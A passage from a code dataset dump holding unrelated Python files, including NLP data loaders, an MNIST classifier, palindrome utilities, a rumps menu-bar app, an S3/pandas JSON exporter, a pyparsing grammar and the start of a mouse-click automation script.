is:\",text)\r\ncv2.waitKey(0)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"555775671","text":"# Reference: https://github.com/liufly/delayed-memory-update-entnet\n\nfrom __future__ import absolute_import\n\nimport json\nimport operator\nimport os\nimport re\nimport sys\nimport xml.etree.ElementTree\n\nimport nltk\nimport numpy as np\n\n\n\ndef load_task(data_dir, aspect2idx):\n in_file = os.path.join(data_dir, 'sentihood-train.json')\n (train_labelled,train_unlabelled,aspect_count_tr) = parse_sentihood_json(in_file)\n in_file = os.path.join(data_dir, 'sentihood-dev.json')\n (dev_labelled,dev_unlabelled,aspect_count_dv) = parse_sentihood_json(in_file)\n in_file = os.path.join(data_dir, 'sentihood-test.json')\n (test_labelled,test_unlabelled,aspect_count_test) = parse_sentihood_json(in_file) \n extract_label(in_file)\n return (train_labelled,train_unlabelled,aspect_count_tr),(dev_labelled,dev_unlabelled,aspect_count_dv),(test_labelled,test_unlabelled,aspect_count_test)\n\n\"\"\" def load_task(data_dir, aspect2idx):\n in_file = os.path.join(data_dir, 'sentihood-train.json')\n (train_labelled,train_unlabelled) = parse_sentihood_json(in_file)\n in_file = os.path.join(data_dir, 'sentihood-dev.json')\n dev = parse_sentihood_json(in_file)\n in_file = os.path.join(data_dir, 'sentihood-test.json')\n test = parse_sentihood_json(in_file) \n \n train_labelled = convert_input(train_labelled, aspect2idx)\n train_aspect_idx = get_aspect_idx(train_labelled, aspect2idx)\n train_labelled = tokenize(train_labelled)\n #----------------------------------------\n train_unlabelled = convert_input(train_unlabelled, aspect2idx)\n train_aspect_idx = get_aspect_idx(train_unlabelled, aspect2idx)\n train_unlabelled = tokenize(train_unlabelled)\n dev = convert_input(dev, aspect2idx)\n dev_aspect_idx = get_aspect_idx(dev, aspect2idx)\n dev = tokenize(dev)\n test = convert_input(test, aspect2idx)\n test_aspect_idx = get_aspect_idx(test, aspect2idx)\n test = tokenize(test) \n\n #return (train, train_aspect_idx), (dev, dev_aspect_idx), (test, test_aspect_idx)\n return (train_labelled,train_unlabelled,train_aspect_idx) \"\"\"\n\n\n\"\"\" def get_aspect_count(aspect):\n aspect_freq={}\n if aspect in aspect_freq.keys():\n aspect_freq[aspect]+=1\n else:\n aspect_freq[aspect]=1 \"\"\"\n\ndef extract_label(in_file):\n with open(in_file) as f:\n data = json.load(f)\n test_set=[]\n 
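# test_set collects (sentence, aspect) pairs and test_labels just the aspect\n    # strings, matching the two files written out below.\n    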
test_labels=[]\n for d in data:\n text = d['text']\n opinions = []\n aspect=''\n for opinion in d['opinions']:\n aspect = opinion['aspect']\n if len(d['opinions'])!=0:\n test_set.append((text,aspect))\n test_labels.append(aspect)\n print('No. of data in test set: ',len(test_set),len(test_labels))\n out=open(\"test data_labels/test_set.txt\", \"w\", encoding='utf-8')\n out.write(str(test_set))\n with open(\"test data_labels/test_labels.txt\", \"w\", encoding='utf-8') as out:\n out.write(\"\\n\".join(str(i) for i in test_labels))\n return None\n\n\ndef get_aspect_idx(data, aspect2idx):\n ret = []\n for _, _, _, aspect, _ in data:\n ret.append(aspect2idx[aspect])\n assert len(data) == len(ret)\n return np.array(ret)\n\n\ndef parse_sentihood_json(in_file):\n with open(in_file) as f:\n data = json.load(f)\n\n review_text_labelled=[] #added to collect only the text -Sudeshna\n review_text_unlabelled=[]\n test_labels=[]\n \n ret = []\n unlabelled_ret=[]\n aspect_freq={}\n\n for d in data:\n text = d['text']\n sent_id = d['id']\n opinions = []\n targets = set()\n for opinion in d['opinions']:\n sentiment = opinion['sentiment']\n aspect = opinion['aspect']\n if aspect in aspect_freq.keys(): #to calculate aspect frequency\n aspect_freq[aspect]+=1\n else:\n aspect_freq[aspect]=1\n target_entity = opinion['target_entity']\n targets.add(target_entity)\n opinions.append((target_entity, aspect, sentiment))\n if len(d['opinions'])!=0:\n ret.append((sent_id, text, opinions))\n review_text_labelled.append(text)\n else:\n unlabelled_ret.append((sent_id, text, opinions))\n review_text_unlabelled.append(text)\n #return ret,unlabelled_ret\n print(review_text_labelled[:3])\n return review_text_labelled, review_text_unlabelled,aspect_freq #using only review text to train ABAE model - Sudeshna\n\n\ndef convert_input(data, all_aspects):\n ret = []\n for sent_id, text, opinions in data:\n for target_entity, aspect, sentiment in opinions:\n if aspect not in all_aspects:\n continue\n ret.append((sent_id, text, target_entity, aspect, sentiment))\n assert 'LOCATION1' in text\n targets = set(['LOCATION1'])\n if 'LOCATION2' in text:\n targets.add('LOCATION2')\n for target in targets:\n aspects = set([a for t, a, _ in opinions if t == target])\n none_aspects = [a for a in all_aspects if a not in aspects]\n for aspect in none_aspects:\n ret.append((sent_id, text, target, aspect, 'None'))\n return ret\n\n\ndef tokenize(data):\n ret = []\n for sent_id, text, target_entity, aspect, sentiment in data:\n new_text = nltk.word_tokenize(text)\n new_aspect = aspect.split('-')\n ret.append((sent_id, new_text, target_entity, new_aspect, sentiment))\n return ret\n","sub_path":"AE_Sememes/AE_CSA/code_aecsa/test/data_utils_sentihood.py","file_name":"data_utils_sentihood.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"40991963","text":"\"\"\"\nImplementation of POSFrequencyPipeline for score ten only.\n\"\"\"\nimport collections\nfrom pathlib import Path\nimport re\nfrom pipeline import TextProcessingPipeline\nfrom constants import ASSETS_PATH\nfrom visualizer import visualize\n\nclass POSFrequencyPipeline:\n def run(self):\n # we guess that all files are already preprocessed in a dir\n pattern = re.compile(\"\\(\\w+\")\n path = Path(ASSETS_PATH)\n files = list(path.glob('**/*_processed.txt'))\n if not files:\n print(\"no info to plot\")\n speech_parts = collections.Counter()\n for file in files:\n with open(file) as f:\n data = 
f.read()\n            strings = [i[1:] for i in re.findall(pattern, data)]\n            speech_parts.update(strings)\n        visualize(speech_parts, \"picture.png\")\n\ndef main():\n    pipeline = POSFrequencyPipeline()\n    pipeline.run()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"pos_frequency_pipeline.py","file_name":"pos_frequency_pipeline.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"185962699","text":"import unittest\nfrom test_sqlite_insert_user_story import DatabaseInsert\nclass TestInsert(unittest.TestCase):\n    def test_uno(self):\n        db=DatabaseInsert()\n        self.assertEqual(len(db.userstories),0)\n    \n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"test_insert.py","file_name":"test_insert.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"340641089","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nfrom tutorials.hvassTutorials.helperFunction import plot_example_errors,plot_confusion_matrix\nimport time\nfrom datetime import timedelta\nimport math\n\n# We also need PrettyTensor.\n# pip3 install prettytensor\nimport prettytensor as pt\n\nfrom tensorflow.examples.tutorials.mnist import input_data\ndata = input_data.read_data_sets('data/MNIST/', one_hot=True)\n\ndata.test.cls = np.argmax(data.test.labels, axis=1)\n\n# We know that MNIST images are 28 pixels in each dimension.\nimg_size = 28\n\n# Images are stored in one-dimensional arrays of this length.\nimg_size_flat = img_size * img_size\n\n# Tuple with height and width of images used to reshape arrays.\nimg_shape = (img_size, img_size)\n\n# Number of colour channels for the images: 1 channel for gray-scale.\nnum_channels = 1\n\n# Number of classes, one class for each of 10 digits.\nnum_classes = 10\n\nx = tf.placeholder(tf.float32, shape=[None, img_size_flat], name='x')\n\nx_image = tf.reshape(x, [-1, img_size, img_size, num_channels])\n\ny_true = tf.placeholder(tf.float32, shape=[None, num_classes], name='y_true')\n\ny_true_cls = tf.argmax(y_true, dimension=1)\n\n\nx_pretty = pt.wrap(x_image)\n\nwith pt.defaults_scope(activation_fn=tf.nn.relu):\n    y_pred, loss = x_pretty.\\\n        conv2d(kernel=5, depth=16, name='layer_conv1').\\\n        max_pool(kernel=2, stride=2).\\\n        conv2d(kernel=5, depth=36, name='layer_conv2').\\\n        max_pool(kernel=2, stride=2).\\\n        flatten().\\\n        fully_connected(size=128, name='layer_fc1').\\\n        softmax_classifier(num_classes=num_classes, labels=y_true)\n\n\ndef get_weights_variable(layer_name):\n    # Retrieve an existing variable named 'weights' in the scope\n    # with the given layer_name.\n    # This is awkward because the TensorFlow function was\n    # really intended for another purpose.\n\n    with tf.variable_scope(layer_name, reuse=True):\n        variable = tf.get_variable('weights')\n\n    return variable\n\n\nweights_conv1 = get_weights_variable(layer_name='layer_conv1')\nweights_conv2 = get_weights_variable(layer_name='layer_conv2')\n\noptimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(loss)\n\ny_pred_cls = tf.argmax(y_pred, dimension=1)\n\ncorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\n\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsession = tf.Session()\nsession.run(tf.global_variables_initializer())\n\ntrain_batch_size = 64\n\n# Counter for total number of iterations performed so far.\ntotal_iterations = 0\n\ndef 
optimize(num_iterations):\n # Ensure we update the global variable rather than a local copy.\n global total_iterations\n\n # Start-time used for printing time-usage below.\n start_time = time.time()\n\n for i in range(total_iterations,\n total_iterations + num_iterations):\n\n # Get a batch of training examples.\n # x_batch now holds a batch of images and\n # y_true_batch are the true labels for those images.\n x_batch, y_true_batch = data.train.next_batch(train_batch_size)\n\n # Put the batch into a dict with the proper names\n # for placeholder variables in the TensorFlow graph.\n feed_dict_train = {x: x_batch,\n y_true: y_true_batch}\n\n # Run the optimizer using this batch of training data.\n # TensorFlow assigns the variables in feed_dict_train\n # to the placeholder variables and then runs the optimizer.\n session.run(optimizer, feed_dict=feed_dict_train)\n\n # Print status every 100 iterations.\n if i % 100 == 0:\n # Calculate the accuracy on the training-set.\n acc = session.run(accuracy, feed_dict=feed_dict_train)\n\n # Message for printing.\n msg = \"Optimization Iteration: {0:>6}, Training Accuracy: {1:>6.1%}\"\n\n # Print it.\n print(msg.format(i + 1, acc))\n\n # Update the total number of iterations performed.\n total_iterations += num_iterations\n\n # Ending time.\n end_time = time.time()\n\n # Difference between start and end-times.\n time_dif = end_time - start_time\n\n # Print the time-usage.\n print(\"Time usage: \" + str(timedelta(seconds=int(round(time_dif)))))\n\n# Split the test-set into smaller batches of this size.\ntest_batch_size = 256\n\ndef print_test_accuracy(show_example_errors=False,\n show_confusion_matrix=False):\n\n # Number of images in the test-set.\n num_test = len(data.test.images)\n\n # Allocate an array for the predicted classes which\n # will be calculated in batches and filled into this array.\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n\n # Now calculate the predicted classes for the batches.\n # We will just iterate through all the batches.\n # There might be a more clever and Pythonic way of doing this.\n\n # The starting index for the next batch is denoted i.\n i = 0\n\n while i < num_test:\n # The ending index for the next batch is denoted j.\n j = min(i + test_batch_size, num_test)\n\n # Get the images from the test-set between index i and j.\n images = data.test.images[i:j, :]\n\n # Get the associated labels.\n labels = data.test.labels[i:j, :]\n\n # Create a feed-dict with these images and labels.\n feed_dict = {x: images,\n y_true: labels}\n\n # Calculate the predicted class using TensorFlow.\n cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict)\n\n # Set the start-index for the next batch to the\n # end-index of the current batch.\n i = j\n\n # Convenience variable for the true class-numbers of the test-set.\n cls_true = data.test.cls\n\n # Create a boolean array whether each image is correctly classified.\n correct = (cls_true == cls_pred)\n\n # Calculate the number of correctly classified images.\n # When summing a boolean array, False means 0 and True means 1.\n correct_sum = correct.sum()\n\n # Classification accuracy is the number of correctly classified\n # images divided by the total number of images in the test-set.\n acc = float(correct_sum) / num_test\n\n # Print the accuracy.\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, num_test))\n\n # Plot some examples of mis-classifications, if desired.\n if show_example_errors:\n print(\"Example errors:\")\n 
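# plot_example_errors and plot_confusion_matrix come from the helperFunction\n        # module imported at the top; they are assumed to render the mis-classified\n        # digits and the confusion matrix from the predicted classes.\n        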
plot_example_errors(cls_pred=cls_pred, correct=correct)\n\n    # Plot the confusion matrix, if desired.\n    if show_confusion_matrix:\n        print(\"Confusion Matrix:\")\n        plot_confusion_matrix(cls_pred=cls_pred)","sub_path":"tutorials/hvassTutorials/prettyTensor.py","file_name":"prettyTensor.py","file_ext":"py","file_size_in_byte":6670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"603765809","text":"from itertools import count\n\ndef unique(L):\n\tseen = set()\n\tfor l in L:\n\t\tif l not in seen:\n\t\t\tyield l\n\t\t\tseen.add(l)\n\n# simple trial-division primality test, used by the pseudoprime search below\ndef is_prime(n):\n\tif n < 2:\n\t\treturn False\n\tfor d in range(2, int(n ** 0.5) + 1):\n\t\tif n % d == 0:\n\t\t\treturn False\n\treturn True\n\na = list([n for n in range(2, 10000) if(2**(n-1))%n == 1])\n\nprint(len(a))\n\n#b = [n for n in range(2, 1000000) if all((k**(n-1))%n == 1 for k in range(2, 10))]\n\n#print(b)\n\npseudoPrime = lambda n: all((k**(n-1))%n == 1 for k in range(2, 10) if k!=n)\n\nfor i in count(2):\n\tif pseudoPrime(i) and not is_prime(i):\n\t\tprint(i)","sub_path":"15.12.2016predavanje.py","file_name":"15.12.2016predavanje.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"377685486","text":"def is_palindrome(word):\r\n    \"\"\" (str) -> bool\r\n    \r\n    Precondition: used only for strings that consist only of lowercase \r\n    alphabetic characters.\r\n    \r\n    Return True iff word is a palindrome. \r\n    \r\n    Examples:\r\n    >>> is_palindrome(\"radar\")\r\n    True\r\n    >>> is_palindrome(\"hello\")\r\n    False\r\n    >>> is_palindrome(\"goodbye\")\r\n    False\r\n    >>> is_palindrome(\"a\")\r\n    True\r\n    >>> is_palindrome(\"\")\r\n    True\r\n    \r\n    \"\"\"\r\n    \r\n    reverse_word = \"\"\r\n    index = len(word) - 1 \r\n    \"\"\"we will start adding characters in reverse_word starting from the last \r\n    character in word\"\"\"\r\n    \r\n    while(index > -1):\r\n        reverse_word = reverse_word + word[index] \r\n        index = index - 1\r\n    \"\"\" adds the characters from word to reverse_word starting from the last \r\n    character in word and ending at the first character in word.\"\"\"\r\n    \r\n    return word == reverse_word\r\n\r\ndef is_palindromic_phrase(phrase):\r\n    \"\"\" (str) -> bool\r\n    \r\n    Return True iff phrase is a palindrome (disregarding non-alphabetic \r\n    characters and treating uppercase letters and lowercase letters as the\r\n    same).\r\n    \r\n    Examples:\r\n    >>> is_palindromic_phrase(\"radar\")\r\n    True\r\n    >>> is_palindromic_phrase(\"Radar\")\r\n    True\r\n    >>> is_palindromic_phrase(\"Ra d Ar\")\r\n    True\r\n    >>> is_palindromic_phrase(\"rad?ar\")\r\n    True\r\n    >>> is_palindromic_phrase(\"radar9\")\r\n    True\r\n    >>> is_palindromic_phrase(\"radart\")\r\n    False\r\n    >>> is_palindromic_phrase(\"12321\")\r\n    True\r\n    \r\n    \"\"\"\r\n    \r\n    index = 0\r\n    \r\n    \"\"\"In the following while loop I remove non-alphabetic characters from \r\n    phrase and assign the result to new_phrase.\"\"\"\r\n    \r\n    new_phrase = phrase\r\n    while index < len(new_phrase):\r\n        if not(new_phrase[index].isalpha()):\r\n            if index == len(new_phrase) - 1:\r\n                new_phrase = new_phrase[:index]\r\n                index = index - 1\r\n            else: \r\n                new_phrase = new_phrase[:index] + new_phrase[index + 1:]\r\n                index = index - 1\r\n        index = index + 1 \r\n    \r\n    new_phrase = new_phrase.lower() \r\n    \"\"\" I added the above code because we treat uppercase and lowercase letters\r\n    in the same way.\"\"\"\r\n    \r\n    \r\n    return is_palindrome(new_phrase)\r\n    \r\ndef get_odd_palindrome_at(word, center_index):\r\n    \"\"\" (str, int) -> str\r\n    \r\n    Precondition: All the characters in word are lowercase alphabetical \r\n    characters. 
center_index must be in the bounds of word.\r\n \r\n Return the longest palindrome that has an odd length whose center is \r\n at center_index in the word string.\r\n \r\n Examples: \r\n >>> get_odd_palindrome_at(\"oradarp\", 3)\r\n 'radar'\r\n >>> get_odd_palindrome_at(\"pada\", 2)\r\n 'ada'\r\n >>> get_odd_palindrome_at(\"acca\", 2)\r\n 'c'\r\n \r\n \"\"\"\r\n\r\n forward_index = center_index + 1\r\n backward_index = center_index - 1\r\n palindromes = []\r\n longest_palindrome = \"\"\r\n \r\n \r\n \"\"\" The following loop checks to see whether each odd-length sequence of \r\n characters whose center is at center_index is a palidrome. If it is a \r\n palindrome, it is added to the palindromes list. \"\"\"\r\n while((forward_index < len(word)) and (backward_index > -1)):\r\n\r\n if is_palindrome(word[backward_index:forward_index + 1]):\r\n palindromes.append(word[backward_index:forward_index + 1])\r\n \r\n forward_index += 1\r\n backward_index -= 1\r\n \r\n if len(palindromes) == 1: \r\n \"\"\" If we've only added one palindrome to the list then it is by default\r\n the biggest palindrome in the string.\"\"\"\r\n return palindromes[0]\r\n elif len(palindromes) == 0:\r\n \"\"\"We must also evaluate the case where there have been no palindromes \r\n added the list. However, we could single alphabetic characters as \r\n palindromes, thus we can return the character at the center_index as \r\n the largest palindrome in the string.\"\"\"\r\n return word[center_index]\r\n else:\r\n for p in range(1, len(palindromes)):\r\n longest_palindrome = max(palindromes[p], palindromes[p - 1])\r\n return longest_palindrome\r\n \r\n ","sub_path":"palindromes.py","file_name":"palindromes.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"379550312","text":"#coding=utf8\nimport rumps\nimport urllib\nimport json,sys\n# reload(sys)\n# sys.setdefaultencoding( \"utf-8\" )\n\nclass AutosenseIOSApp(rumps.App):\n\n def __init__(self,_):\n self.configure()\n\n def configure(self):\n menus = []\n menus.append(\"Device List\")\n menus.append(rumps.MenuItem(\"Edit Config ...\", key=','))\n super(AutosenseIOSApp, self).__init__(type(self).__name__, menu=menus)\n self.icon = 'app.icns'\n\n @rumps.timer(60)\n def location(self, _):\n title = ''\n url = \"https://api.map.baidu.com/location/ip?ak=uFdtjZNA62UtZUi2tjdGXjIaxOt947nM\"\n j = json.loads( urllib.urlopen( url ).read() )\n title = title + j['content']['address_detail']['province'] + '|' + j['content']['address_detail']['city']\n self.title = title\n\n @rumps.clicked(\"Edit Config ...\")\n def Config(self, _):\n window = rumps.Window(dimensions=(320,120),ok=u\"确定\",cancel=\"Cancel\",)\n window.title = 'Dietary Restrictions'\n window.message = 'Information regarding dietary restrictions.'\n window.default_text = 'mlh.get_dietary_users()'\n window.run()\n\n @rumps.clicked('Start Server')\n def button(self, sender):\n sender.title = 'Server: Off' if 'On' in sender.title else 'Server: On'\n rumps.notification(\"MacIOS USB Device\", None, \"UDID: 358520080883866\\nOS: iPhone10,4\")\n\n @rumps.clicked(\"Preferences\")\n def prefs(self, _):\n rumps.alert(\"jk! 
no preferences available!\")\n\n @rumps.clicked(\"Silly button\")\n def onoff(self, sender):\n print(sender.state)\n sender.state = not sender.state\n \n @rumps.clicked(\"Say hi\")\n def sayhi(self, _):\n rumps.Window(\"I can't think of a good example app...\").run()\n\n\nif __name__ == \"__main__\":\n AutosenseIOSApp(\"MacAutoIOS\").run()\n # app = rumps.App(\"AutosenseIOSApp\", icon='demo.icns')\n # app.menu = [\n # 'Attendees',\n # {\n # 'MLH': {\n # \"Guides\": [\"Organiser\", \"Sanctions\", \"Code of Conduct\"],\n # \"Contacts\": [\"Info\", \"Slack\", \"Incidents\"],\n # \"Website\": []\n # }\n # },\n # None,\n # 'About',\n # None\n # ]\n # app.run()","sub_path":"local/projects/pygui/MacIOS_GUI.py","file_name":"MacIOS_GUI.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"496102220","text":"import os\nimport io\nimport boto3\nimport pandas as pd\nfrom json import dump\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\ndef process_data(students, teachers):\n result = []\n for _, row in teachers.iterrows():\n student_data = []\n for _, _row in students[students['cid'] == row['cid']].iterrows():\n student_data.append({\n 'student_id': _row['id'],\n 'student_name': _row['fname'] + ' ' + _row['lname'],\n 'email': _row['email'],\n 'ssn': _row['ssn'],\n 'address': _row['address']\n })\n result.append({\n 'class_id': row['cid'],\n 'teacher_id': row['id'],\n 'teacher_name': row['fname'] + ' ' + row['lname'],\n 'students': student_data\n })\n\n try:\n with open('output.json', 'w') as outfile:\n dump(result, outfile, indent=4)\n print('output.json file generated successfully')\n except Exception as ex:\n print('Unable to create output.json')\n\n\ndef read_files(file_path, n):\n print('Processing...')\n students = teachers = None\n if n == 1:\n for path in file_path:\n if path.endswith('.parquet'):\n teachers = pd.read_parquet(path, engine='pyarrow')\n elif path.endswith('.csv'):\n students = pd.read_csv(path, delimiter='_')\n elif n == 2:\n try:\n s3 = boto3.client('s3',\n region_name=os.getenv('AWS_REGION_NAME'),\n aws_access_key_id=os.getenv('AWS_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY')\n )\n for path in file_path:\n bucket = path.split('/')[0]\n file_name = path.replace(bucket + '/', '')\n obj = s3.get_object(Bucket=bucket, Key=file_name)\n if path.endswith('.parquet'):\n teachers = pd.read_parquet(io.BytesIO(obj['Body'].read()), engine='pyarrow')\n elif path.endswith('.csv'):\n students = pd.read_csv(io.BytesIO(obj['Body'].read()), delimiter='_')\n except Exception as err:\n print(\"Something went wrong, please check file paths and credentials\")\n print(err)\n process_data(students, teachers)\n\n\nif __name__ == \"__main__\":\n\n try:\n print(\"Select the file storage from the options given below :\\n\")\n print(\"1. Local file storage.\\n2. 
AWS S3\\n\")\n n = int(input(\">> \"))\n print()\n file_path=[]\n if n == 1:\n file_path = [\"./dataset/students.csv\", \"./dataset/teachers.parquet\"]\n elif n == 2:\n print(\"Enter complete S3 file path, eg:- bucket/folder/students.csv\")\n students = input(\"path for students file : \")\n teachers = input(\"path for teachers file : \")\n file_path = [students, teachers]\n if not teachers.endswith('.parquet') or not students.endswith('.csv'):\n print(\"Entered invalid paths, please try again.\")\n exit(0)\n else:\n print(\"Invalid selection, please try again.\")\n exit(0)\n read_files(file_path, n)\n except Exception as ex:\n print('Files not found, please check file paths and try again')\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"175627013","text":"import random\n\nfrom simulator import *\n\n\ndef naive_pareto_frontier(ds):\n def better(xs, ys):\n assert len(xs) == len(ys)\n return all(x <= y for x, y in zip(xs, ys))\n ds = list(ds)\n assert len(ds) == len(set(ds))\n new_ds = []\n for i, a in enumerate(ds):\n if any(better(b, a) for b in new_ds):\n continue\n if any(better(ds[j], a) for j in range(i+1, len(ds))):\n continue\n new_ds.append(a)\n return new_ds\n\n\ndef pareto_frontier(ds):\n assert all(isinstance(d, tuple) for d in ds)\n ds = sorted(ds)\n fs = []\n for d in ds:\n if any(all(x <= y for x, y in zip(f, d)) for f in fs):\n continue\n fs.append(d)\n return fs\n","sub_path":"production/pareto.py","file_name":"pareto.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"427301539","text":"# Copyright 2010-2011 Isotoma Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom yay.pyparsing import *\n\nfrom yay import nodes\n\nclass Parser(object):\n def __init__(self, composer):\n self.composer = composer\n\n if composer and composer.secret:\n self.secret = True\n else:\n self.secret = False\n\n self.setup_parser()\n\n def box(self, value):\n b = nodes.Boxed(value)\n b.secret = self.secret\n return b\n\n def dollar(self, str, words, tokens):\n return self.box(\"$\")\n\n def boxed_string(self, str, words, tokens):\n return self.box(tokens[0])\n\n def boxed_int(self, str, words, tokens):\n return self.box(int(tokens[0]))\n\n def boxed_octal(self, str, words, tokens):\n return self.box(int(tokens[0], 8))\n\n def concatenation(self, str, words, tokens):\n if len(tokens) == 1:\n return tokens[0]\n c = nodes.Concatenation(*tokens)\n c.secret = self.secret\n return c\n\n def function_call_action(self, s, w, t):\n return nodes.Function(t[0], t[1])\n\n def filter_bin_comparison_action(self, s, w, t):\n cls = {\n \"=\": nodes.Equal,\n \"!=\": nodes.NotEqual,\n \"<\": nodes.LessThan,\n \"<=\": nodes.LessThanEqual,\n \">\": nodes.GreaterThan,\n \">=\": nodes.GreaterThanEqual,\n }[t[0][1]]\n return cls(t[0][0], t[0][2])\n\n def 
filter_expression_action(self, s, w, t):\n node = t[0]\n for i in range(1, len(t)):\n if t[i] == \"and\":\n node = nodes.And(node, t[i+1])\n elif t[i] == \"or\":\n node = nodes.Or(node, t[i+1])\n i += 1\n return node\n\n def handle_expression(self, s, w, t):\n if len(t[0]) == 1:\n return t[0]\n\n t = t[0]\n\n node = nodes.Else(t[0])\n\n for i in range(1, len(t)):\n if i % 2:\n if t[i] != \"else\":\n #FIXME: Raise some kind of parasing error\n pass\n else:\n node.append(t[i])\n\n return [node]\n\n def index_access_action(self, s, w, t):\n return nodes.Access(None, t[0])\n\n def full_expression_action(self, s, w, t):\n node = None\n for token in t:\n if not isinstance(token, nodes.Node):\n node = nodes.Access(node, nodes.Boxed(token))\n else:\n token.container = node\n if node:\n node.set_parent(token)\n node = token\n\n return node\n\n def ugh(self, s, w, t):\n if not t or not t[0]:\n return []\n return self.boxed_string(s, w, t)\n\n def inline_call(self, s, w, t):\n return nodes.Call(self.composer, t[0])\n\n def setup_parser(self):\n ELSE = Keyword(\"else\")\n AND = Keyword(\"and\")\n OR = Keyword(\"or\")\n IN = Keyword(\"in\")\n BINOP = oneOf(\"= != < > <= >=\")\n\n identifier = Word(alphanums+\"_\") | Keyword(\"@\")\n arithSign = Word(\"+-\",exact=1)\n\n octNum = Combine(Optional(arithSign) + Suppress(\"0\") + Word(nums)).setParseAction(self.boxed_octal)\n intNum = Combine(Optional(arithSign) + Word(nums)).setParseAction(self.boxed_int)\n\n expression = Forward()\n\n macro_call = Word(alphanums+\"_.\") + Suppress(\"!\")\n macro_call.setParseAction(self.inline_call)\n\n function_identifier = Word(alphanums+\"_\")\n function_call = function_identifier + Group(Suppress(\"(\") + Optional(expression + ZeroOrMore(Suppress(\",\") + expression)) + Suppress(\")\"))\n function_call.setParseAction(self.function_call_action)\n\n filterExpression = Forward()\n\n filter_bin_comparison = Group(expression + BINOP + expression)\n filter_bin_comparison.setParseAction(self.filter_bin_comparison_action)\n\n filterCondition = (\n filter_bin_comparison |\n ( \"(\" + filterExpression + \")\" )\n )\n\n filterExpression << filterCondition + ZeroOrMore((AND|OR) + filterExpression)\n filterExpression.setParseAction(self.filter_expression_action)\n\n full_list_access = Suppress(\"[\") + filterExpression + Suppress(\"]\")\n full_list_access.setParseAction(lambda s, w, t: nodes.Filter(None, t[0]))\n\n listAccess = Suppress(\"[\") + expression + Suppress(\"]\")\n listAccess.setParseAction(self.index_access_action)\n\n\n fullExpression = identifier + ZeroOrMore(\n full_list_access |\n listAccess |\n Suppress(\".\") + identifier\n )\n fullExpression.setParseAction(self.full_expression_action)\n\n expression_part = (\n octNum |\n intNum |\n macro_call |\n function_call |\n fullExpression\n )\n\n expression << Group(expression_part + Optional(ELSE + expression)).setParseAction(self.handle_expression)\n\n bracketed_expression = Suppress(\"${\").leaveWhitespace() + expression + Suppress(\"}\").leaveWhitespace()\n\n myrol = restOfLine.copy().setParseAction(self.ugh)\n\n templated_string = ZeroOrMore(\n Keyword(\"$$\").setParseAction(self.dollar) |\n bracketed_expression |\n SkipTo(\"${\").leaveWhitespace().setParseAction(self.boxed_string)\n ) + myrol\n templated_string.setParseAction(self.concatenation)\n\n foreachif = Optional(Keyword(\"if\") + filterExpression)\n\n foreach_statement = identifier + Suppress(\"in\") + expression + Optional(Keyword(\"chain\") | Keyword(\"nochain\") | Keyword(\"flatten\")) + foreachif\n 
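# As a rough illustration (not taken from the yay test-suite), foreach_statement\n        # is meant to match fragments such as: item in mylist.items chain if item.x = 1\n        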
as_statement = expression + Suppress(\"as\") + identifier\n\n self.templated_string = templated_string\n self.foreach_statement = foreach_statement\n self.as_statement = as_statement\n self.expression = expression\n\n","sub_path":"yay/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"261888396","text":"from PIL import ImageGrab\nimport os\nimport time\nimport win32api, win32con\nimport json\nimport datetime\nfrom az_code import *\nfrom PIL import ImageOps\nfrom numpy import *\n\n\ndef click_menu(timer=2):\n\tmove_and_click((995,941), timer)\n\n\ndef click_punch(timer=2):\n\tmove_and_click((1408,916), timer)\n\n\ndef click_stop(timer):\n\tmove_and_click((1384,947), timer)\n\n\ndef get_rewards(timer):\n\tmove_and_click((1135,935), timer)\n\ndef 